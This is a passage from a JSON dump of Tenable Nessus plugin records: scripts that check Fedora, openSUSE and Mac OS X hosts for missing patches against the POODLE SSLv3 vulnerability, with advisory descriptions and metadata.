attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - SSLv3 server connections are now disabled by default, in\n response to the POODLE vulnerability, see\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-\n 3566.\n\n - Several PGP/Core plugin improvements\n\n - A new version of the RSSyl plugin, completely redesigned\n and rewritten.\n\n - The results of TAB address completion in the Compose\n window have improved ordering.\n\n - Due to popular demand, use of the Up key in the message\n body in the Compose window stops at the top of the\n message body and does not continue up to the header\n fields. This reverts the behaviour introduced in version\n 3.10.0.\n\n - In the Compose window, when navigating with the arrow\n keys, selecting, and thus modifying, the Account\n selector is now prevented.\n\n - In the Compose window, a mnemonic (s) has been added to\n the Subject line.\n\n - The Queue folder is highlighted if there are messages in\n its sub-folders and the tree is collapsed.\n\n - When sorting messages by 'thread date', clicking the\n 'Date' column header will now toggle between\n ascending/descending and will not switch to 'date'\n sorting.\n\n - A new QuickSearch filter has been added that searches a\n header's content only. H S : messages which contain S in\n the value of any header.\n\n - A Reply-To field has been added to the main Template\n configuration.\n\n - The menubar can now be hidden, default hotkey: F12.\n\n - Fancy plugin: A user-controlled stylesheet can now be\n used.\n\n - Python plugin: Add flag attributes to MessageInfo\n object.\n\n - Python plugin: Make 'account' property of ComposeWindow\n read/write.\n\n - Libravatar plugin: a network timeout option has been\n added.\n\n - Use 'gnutls_priority' hidden account preference for POP3\n and STARTTLS connections, in addition to SMTP.\n\n - RSSyl plugin: Enable use of .netrc to store network\n credentials.\n\n - The tbird2claws.py script, for converting a Thunderbird\n mailbox to a Claws Mail mailbox, now handles\n sub-directory recursion.\n\n - Updated translations\n\n - Various Bugfixes New in 3.10.1 :\n\n - Add an account preference to allow automatically\n accepting unknown and changed SSL certificates, if\n they're valid (that is, if the root CA is trusted by the\n distro).\n\n - RFE 3196, 'When changing quicksearch Search Type, set\n focus to search input box'\n\n - PGP/Core plugin: Generate 2048 bit RSA keys.\n\n - Major code cleanup.\n\n - Extended claws-mail.desktop with Compose and Receive\n actions.\n\n - Updated Bulgarian, Brazilian Portuguese, Czech, Dutch,\n Esperanto, Finnish, French, German,Hebrew, Hungarian,\n Indonesian, Lithuanian, Slovak, Spanish, and Swedish\n translations.\n\n - Bug fixes\n\nNew in 3.10.0 :\n\n - Complete SSL certificate chains are now saved, and if\n built with Libetpan 1.4.1, the IMAP SSL connection's\n certificate chain is made available. Both of these allow\n correct certificate verification instead of a bogus 'No\n certificate issuer found' status.\n\n - Auto-configuration of account email servers, based on\n SRV records, is now possible. (GLib >= 2.22 is\n required.)\n\n - Added a preference to avoid automatically drafting\n emails that are to be sent encrypted,\n (Configuration/Preferences/Compose/Writing).\n\n - Messages saved as Drafts are now saved as New,\n highlighting the Drafts folder, in order to draw the\n attention to unfinished mails there.\n\n - It is now possible to add a 'Replace signature' button\n to the Compose window toolbar.\n\n - Quotation wrapping and undo/redo in the Compose window\n has been improved.\n\n - 'Reply to all' now excludes your own address.\n\n - The 'Generate X-Mailer header' option has been renamed\n 'Add user agent header' and applies to both X-Mailer and\n X-Newsreader headers.\n\n - Added hidden preferences, 'address_search_wildcard' and\n 'folder_search_wildcard', to choose between matching\n from start of the folder name/address or any part of the\n name. (Activating these options restores the previous\n behaviour.)\n\n - Added hidden preference 'enable_avatars' to control the\n internal capture/render process, and which allows\n disabling it by external plugins for example.\n\n - 'Check for new folders' now only updates the folder\n list, not updating the contents of folders. If needed,\n it can be followed by 'Check for new messages'\n\n - When using Redirect, the redirecting account's address\n is used in the SMTP MAIL FROM instead of the original\n sender's address.\n\n - NEW: Libravatar plugin, which displays avatars from\n https://www.libravatar.org/\n\n - Added support for an arbitrary number and sources of\n 'avatars' and images for email senders, and migrated\n Face and X-Face headers.\n\n - Avatars are now included when printing mails.\n\n - The GPG keyring can now be used as the source for\n address auto-completion.\n\n - The vCalendar and RSSyl plugins now have an option to\n disable SSL certificate verification (and check them by\n default).\n\n - The ClamAV plugin now pops up an error message only once\n instead of repeatedly\n\n - Updated the man page and the manual.\n\n - Updated Brazilian Portuguese, British English, Czech,\n Dutch, Finnish, French, Hebrew, Hungarian, Indonesian,\n Lithuanian, Slovak, Spanish, and Swedish translations.\n\n - Added Esperanto translation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1010993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1011098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1035851\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1036346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1063035\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1070480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1071327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1076387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1078996\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1079509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1079620\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1081224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1090300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1096041\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1096895\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1110255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1153970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=569478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=601982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=977924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=982533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990650\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143133.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b097c80b\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143134.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f807f410\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143135.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7991626b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.libravatar.org/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected claws-mail, claws-mail-plugins and / or libetpan\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:claws-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:claws-mail-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libetpan\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"claws-mail-3.11.1-2.fc20\")) flag++;\nif (rpm_check(release:\"FC20\", reference:\"claws-mail-plugins-3.11.1-1.fc20\")) flag++;\nif (rpm_check(release:\"FC20\", reference:\"libetpan-1.6-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"claws-mail / claws-mail-plugins / libetpan\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-29T13:43:13", "references": ["http://lists.opensuse.org/opensuse-updates/2014-11/msg00035.html"], "pluginID": "79222", "edition": 3, "description": "libserf was updated to disable SSLv2 and SSLv3. 	 libserf was updated to version 1.3.8 on openSUSE 13.1 and 13.2. This release also fixes a problem with handling very large gzip-encoded HTTP responses.\n\nFor openSUSE 12.3 libserf 1.1.1 was patched to disable SSLv2 and SSLv3.", "reporter": "Tenable", "published": "2014-11-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "nessus", "title": "openSUSE Security Update : libserf (openSUSE-SU-2014:1395-1) (POODLE)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["p-cpe:/a:novell:opensuse:libserf-1-0", "p-cpe:/a:novell:opensuse:libserf-debugsource", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:libserf-devel", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libserf-1-1-debuginfo", "p-cpe:/a:novell:opensuse:libserf-1-0-debuginfo", "p-cpe:/a:novell:opensuse:libserf-1-1", "cpe:/o:novell:opensuse:13.1"], "modified": "2016-10-13T00:00:00", "id": "OPENSUSE-2014-647.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79222);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:26 $\");\n\n script_cve_id(\"CVE-2014-3566\");\n\n script_name(english:\"openSUSE Security Update : libserf (openSUSE-SU-2014:1395-1) (POODLE)\");\n script_summary(english:\"Check for the openSUSE-2014-647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libserf was updated to disable SSLv2 and SSLv3. 	 libserf was\nupdated to version 1.3.8 on openSUSE 13.1 and 13.2. This release also\nfixes a problem with handling very large gzip-encoded HTTP responses.\n\nFor openSUSE 12.3 libserf 1.1.1 was patched to disable SSLv2 and\nSSLv3.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-11/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libserf packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libserf-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libserf-1-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libserf-1-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libserf-1-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libserf-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libserf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libserf-1-0-1.1.1-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libserf-1-0-debuginfo-1.1.1-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libserf-debugsource-1.1.1-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libserf-devel-1.1.1-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libserf-1-1-1.3.8-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libserf-1-1-debuginfo-1.3.8-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libserf-debugsource-1.3.8-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libserf-devel-1.3.8-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libserf-1-1-1.3.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libserf-1-1-debuginfo-1.3.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libserf-debugsource-1.3.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libserf-devel-1.3.8-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libserf\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-29T13:44:10", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1191203", "http://www.nessus.org/u?4ad252f0"], "pluginID": "86409", "edition": 3, "description": "Update to latest release\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "reporter": "Tenable", "published": "2015-10-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "nessus", "title": "Fedora 21 : fossil-1.33-1.fc21 (2015-9090) (POODLE)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["p-cpe:/a:fedoraproject:fedora:fossil", "cpe:/o:fedoraproject:fedora:21"], "modified": "2016-10-18T00:00:00", "id": "FEDORA_2015-9090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86409", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9090.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86409);\n script_version(\"$Revision: 2.5 $\");\n script_cvs_date(\"$Date: 2016/10/18 16:42:53 $\");\n\n script_cve_id(\"CVE-2014-3566\");\n script_xref(name:\"FEDORA\", value:\"2015-9090\");\n\n script_name(english:\"Fedora 21 : fossil-1.33-1.fc21 (2015-9090) (POODLE)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest release\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1191203\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-October/169374.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ad252f0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected fossil package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:fossil\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"fossil-1.33-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"fossil\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-07-15T03:56:35", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://www.securityfocus.com/archive/1/533724/30/0/threaded", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://support.apple.com/kb/HT6527"], "pluginID": "78600", "description": "The remote Mac OS X 10.9 host has a version of OS X Server installed that is prior to version 3.2.2. It is, therefore, affected by an information disclosure vulnerability.\n\nAn error exists related to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A man-in-the-middle attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. This is also known as the 'POODLE' issue.", "edition": 3, "reporter": "Tenable", "published": "2014-10-21T00:00:00", "title": "Mac OS X : OS X Server < 3.2.2 SSLv3 Information Disclosure (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x_server"], "id": "MACOSX_SERVER_3_2_2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78600", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78600);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2014-3566\");\n script_bugtraq_id(70574);\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-10-16-4\");\n\n script_name(english:\"Mac OS X : OS X Server < 3.2.2 SSLv3 Information Disclosure (POODLE)\");\n script_summary(english:\"Checks the OS X Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing a security update for OS X Server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X 10.9 host has a version of OS X Server installed\nthat is prior to version 3.2.2. It is, therefore, affected by an\ninformation disclosure vulnerability.\n\nAn error exists related to the way SSL 3.0 handles padding bytes when\ndecrypting messages encrypted using block ciphers in cipher block\nchaining (CBC) mode. A man-in-the-middle attacker can decrypt a\nselected byte of a cipher text in as few as 256 tries if they are able\nto force a victim application to repeatedly send the same data over\nnewly created SSL 3.0 connections. This is also known as the 'POODLE'\nissue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT6527\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/533724/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Mac OS X Server version 3.2.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x_server\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_server_services.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Server/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nif (!ereg(pattern:\"Mac OS X 10\\.9([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Server/Version\");\n\nfixed_version = \"3.2.2\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + \n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"OS X Server\", version);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-07-21T08:33:35", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html"], "pluginID": "84272", "description": "A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.", "edition": 8, "reporter": "Tenable", "published": "2015-06-19T00:00:00", "title": "AIX 6.1 TL 8 : nettcp (IV73973) (POODLE)", "type": "nessus", "enchantments": {"score": 